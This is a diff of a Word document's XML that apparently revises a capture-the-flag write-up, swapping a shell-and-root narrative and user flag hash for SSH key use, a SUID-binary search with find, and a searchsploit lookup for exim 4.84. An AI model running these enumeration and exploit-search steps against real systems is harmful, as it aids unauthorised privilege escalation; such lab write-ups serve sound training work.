-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>After exploitation, a shell session was obtained.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Verification:</w:t>
+        <w:t>Fixed permission issue:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7216,6 +7308,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7227,8 +7320,9 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>id</w:t>
+        <w:t>chmod</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7240,8 +7334,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:br/>
-        <w:t>whoami</w:t>
+        <w:t xml:space="preserve"> 600 id_key4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7261,7 +7354,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Output:</w:t>
+        <w:t>Successfully logged in as:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7307,7 +7400,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>server</w:t>
+        <w:t>paul</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7322,13 +7415,16 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D654188" wp14:editId="70C58F8C">
-            <wp:extent cx="5731510" cy="2800985"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E163C2C" wp14:editId="329681DB">
+            <wp:extent cx="5731510" cy="2997200"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="702941300" name="Picture 1"/>
+            <wp:docPr id="501464090" name="Picture 35"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -7336,11 +7432,17 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="702941300" name=""/>
+                    <pic:cNvPr id="501464090" name="Picture 501464090"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId19" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7348,7 +7450,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2800985"/>
+                      <a:ext cx="5731510" cy="2997200"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -7363,44 +7465,251 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00442255" wp14:editId="06BD98AB">
+            <wp:extent cx="5731510" cy="2997200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="345731810" name="Picture 36"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="345731810" name="Picture 345731810"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2997200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F7EDD1" wp14:editId="1A064FE9">
+            <wp:extent cx="5731510" cy="5946775"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1542484207" name="Picture 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1542484207" name="Picture 1542484207"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="5946775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713FB2F7" wp14:editId="64CFFEB9">
+            <wp:extent cx="5731510" cy="1590040"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1508294854" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1508294854" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1590040"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Retrieving User Flag</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Privilege Escalation Enumeration</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7420,7 +7729,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Navigated to home directory:</w:t>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7466,21 +7775,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cd /home/server</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>ls</w:t>
+        <w:t>find / -perm -u=s -type f 2&gt;/dev/null</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7500,7 +7795,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Found file:</w:t>
+        <w:t>Found interesting binary:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7546,15 +7841,83 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>local.txt</w:t>
+        <w:t>exim</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E1043C" wp14:editId="148A3795">
+            <wp:extent cx="5731510" cy="3479165"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
+            <wp:docPr id="978013670" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="978013670" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3479165"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -7562,11 +7925,36 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Exploit Discovery</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Used searchsploit:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7612,7 +8000,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cat local.txt</w:t>
+        <w:t>searchsploit exim 4.84</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7625,17 +8013,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7643,8 +8020,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>User flag:</w:t>
+        <w:t>Found exploit:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7690,140 +8066,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>c53c08b5bf2b0801c5d0c24149826a6e</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549D8F9F" wp14:editId="0EF1D9CA">
-            <wp:extent cx="5731510" cy="2858135"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="909763447" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="909763447" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2858135"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Privilege Escalation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The shell allowed switching to root directly.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
